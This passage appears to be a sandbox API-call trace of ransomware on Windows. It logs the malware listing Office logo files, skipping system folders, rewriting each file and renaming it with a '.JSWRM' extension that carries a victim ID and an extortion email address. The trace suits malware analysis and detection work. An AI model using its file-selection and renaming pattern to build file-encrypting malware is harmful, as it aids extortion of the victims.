ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6fdbb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9aa, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogoSmall.contrast-white_scale-180.png", cAlternateFileName="ON19DC~1.PNG")) returned 1 [0133.441] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-180.png", lpString2=".") returned 1 [0133.441] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-180.png", lpString2="..") returned 1 [0133.442] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-180.png", lpString2="...") returned 1 [0133.442] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-180.png", lpString2="windows") returned -1 [0133.442] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-180.png", lpString2="recovery") returned -1 [0133.442] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-180.png", lpString2="perflogs") returned -1 [0133.442] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0133.442] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.442] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-180.png", lpString2="system volume information") returned -1 [0133.442] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-180.png", lpString2="msocache") returned 1 [0133.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-white_scale-180.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-white_scale-180.png", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 45 [0133.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-white_scale-180.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-white_scale-180.png", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 45 [0133.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.442] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.443] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2474) returned 1 [0133.443] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.443] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9a0, lpOverlapped=0x0) returned 1 [0133.448] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.448] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9a0, lpOverlapped=0x0) returned 1 [0133.448] CloseHandle (hObject=0x238) returned 1 [0133.448] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.449] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6fdbb6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6fdbb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6fdbb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x60c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogoSmall.contrast-white_scale-80.png", cAlternateFileName="ONB09A~1.PNG")) returned 1 [0133.449] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-80.png", lpString2=".") returned 1 [0133.449] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-80.png", lpString2="..") returned 1 [0133.449] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-80.png", lpString2="...") returned 1 [0133.449] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-80.png", lpString2="windows") returned -1 [0133.449] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-80.png", lpString2="recovery") returned -1 [0133.449] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-80.png", lpString2="perflogs") returned -1 [0133.449] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0133.449] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.449] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-80.png", lpString2="system volume information") returned -1 [0133.449] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-80.png", lpString2="msocache") returned 1 [0133.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-white_scale-80.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0133.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-white_scale-80.png", cchWideChar=44, lpMultiByteStr=0x22ce70, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 44 [0133.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-white_scale-80.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0133.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-white_scale-80.png", cchWideChar=44, lpMultiByteStr=0x22cdc8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 44 [0133.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.450] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1548) returned 1 [0133.450] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.450] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x600, lpOverlapped=0x0) returned 1 [0133.452] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.452] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x600, lpOverlapped=0x0) returned 1 [0133.452] CloseHandle (hObject=0x238) returned 1 [0133.452] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.454] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a723def, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x782, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogoSmall.scale-100.png", cAlternateFileName="ON8AF0~1.PNG")) returned 1 [0133.457] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-100.png", lpString2=".") returned 1 [0133.457] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-100.png", lpString2="..") returned 1 [0133.457] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-100.png", lpString2="...") returned 1 [0133.457] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-100.png", lpString2="windows") returned -1 [0133.457] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-100.png", lpString2="recovery") returned -1 [0133.457] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-100.png", lpString2="perflogs") returned -1 [0133.457] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-100.png", lpString2="documents and settings") returned 1 [0133.457] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.457] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-100.png", lpString2="system volume information") returned -1 [0133.457] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-100.png", lpString2="msocache") returned 1 [0133.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.scale-100.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0133.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.scale-100.png", cchWideChar=30, lpMultiByteStr=0x241100, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 30 [0133.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.scale-100.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0133.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.scale-100.png", cchWideChar=30, lpMultiByteStr=0x240f70, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 30 [0133.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.457] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.458] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1922) returned 1 [0133.458] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.458] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x780, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x780, lpOverlapped=0x0) returned 1 [0133.460] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.460] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x780, lpOverlapped=0x0) returned 1 [0133.460] CloseHandle (hObject=0x238) returned 1 [0133.460] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.461] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a723def, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x820, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogoSmall.scale-140.png", cAlternateFileName="ON4822~1.PNG")) returned 1 [0133.461] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-140.png", lpString2=".") returned 1 [0133.461] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-140.png", lpString2="..") returned 1 [0133.461] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-140.png", lpString2="...") returned 1 [0133.461] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-140.png", lpString2="windows") returned -1 [0133.461] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-140.png", lpString2="recovery") returned -1 [0133.461] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-140.png", lpString2="perflogs") returned -1 [0133.461] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-140.png", lpString2="documents and settings") returned 1 [0133.461] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.461] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-140.png", lpString2="system volume information") returned -1 [0133.461] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-140.png", lpString2="msocache") returned 1 [0133.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.scale-140.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0133.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.scale-140.png", cchWideChar=30, lpMultiByteStr=0x2412b8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 30 [0133.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.scale-140.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0133.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.scale-140.png", cchWideChar=30, lpMultiByteStr=0x2411c8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 30 [0133.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.462] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2080) returned 1 [0133.462] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.462] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x820, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x820, lpOverlapped=0x0) returned 1 [0133.464] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.464] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x820, lpOverlapped=0x0) returned 1 [0133.464] CloseHandle (hObject=0x238) returned 1 [0133.465] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.466] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a723def, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9a6, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogoSmall.scale-180.png", cAlternateFileName="ON95B6~1.PNG")) returned 1 [0133.466] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-180.png", lpString2=".") returned 1 [0133.466] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-180.png", lpString2="..") returned 1 [0133.466] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-180.png", lpString2="...") returned 1 [0133.466] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-180.png", lpString2="windows") returned -1 [0133.466] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-180.png", lpString2="recovery") returned -1 [0133.466] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-180.png", lpString2="perflogs") returned -1 [0133.466] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-180.png", lpString2="documents and settings") returned 1 [0133.466] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.466] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-180.png", lpString2="system volume information") returned -1 [0133.466] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-180.png", lpString2="msocache") returned 1 [0133.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.scale-180.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0133.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.scale-180.png", cchWideChar=30, lpMultiByteStr=0x240fe8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 30 [0133.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.scale-180.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0133.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.scale-180.png", cchWideChar=30, lpMultiByteStr=0x241330, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 30 [0133.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.466] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.467] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2470) returned 1 [0133.467] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.467] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9a0, lpOverlapped=0x0) returned 1 [0133.469] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.469] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9a0, lpOverlapped=0x0) returned 1 [0133.469] CloseHandle (hObject=0x238) returned 1 [0133.469] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft 